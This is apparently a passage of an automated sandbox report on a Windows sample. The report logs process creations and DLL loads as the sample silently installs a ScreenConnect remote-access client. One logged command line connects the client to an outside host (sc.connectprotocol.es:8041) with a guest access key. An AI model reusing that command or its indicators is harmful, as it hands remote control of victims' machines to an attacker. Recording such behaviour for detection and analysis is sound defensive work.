                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E58C0E678653AE880B7CA7B7ACABB13E
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6B1ED9B9CEA69D2B0631C700B5D80215 E Global\MSI0000
                                  Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=sc.connectprotocol.es&p=8041&s=5b6ef70d-09c3-4123-8987-219271e6483f&k=BgIAAACkAABSU0ExAAgAAAEAAQC1kWKbpg72shug%2fcuGWQB7IuEBcyNy1kcDtCeo3N0RY4axIPh%2fFMztLn0b%2bG2MIuQOrKGq0Xsvxj7WUcZ%2bdIiMwDt7qlLgFko33osOQisFILKOBROsqmoO0CYg%2fpKva7AaAU%2bym8ZeY9OkPYj7knkvh679kRKgwWM5tfC%2fbhzztt1d5pfIewfVI67rLcAGqXh1hUDy%2bbdI6LG6r8m8lQczrbhXAZJ%2fuvXvUGXN6ZWttC7E00yJiy6fPWNioX5EJ%2fn2uX9gCWU%2bpspAIXXJhOyEHV84BHAUT0rgC1re8M9Puttx9uDjI37OpBOLw%2f5qq735uizmWAgUfhfj%2fLZeRyvQ&t=GOLDEN-TEAM-001"
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "e3ab8850-6564-49da-aa7c-f9fea2857c14" "User"
                                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "91491e11-89f3-4d65-94f1-b87642885275" "System"
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a532d472f1ff1d4e\ScreenConnect.ClientSetup.msi"Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 247D8C2517E6E69F0B3D03A8794ECC06 CJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E58C0E678653AE880B7CA7B7ACABB13EJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6B1ED9B9CEA69D2B0631C700B5D80215 E Global\MSI0000Jump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5161843 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "e3ab8850-6564-49da-aa7c-f9fea2857c14" "User"Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "91491e11-89f3-4d65-94f1-b87642885275" "System"Jump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: dwrite.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
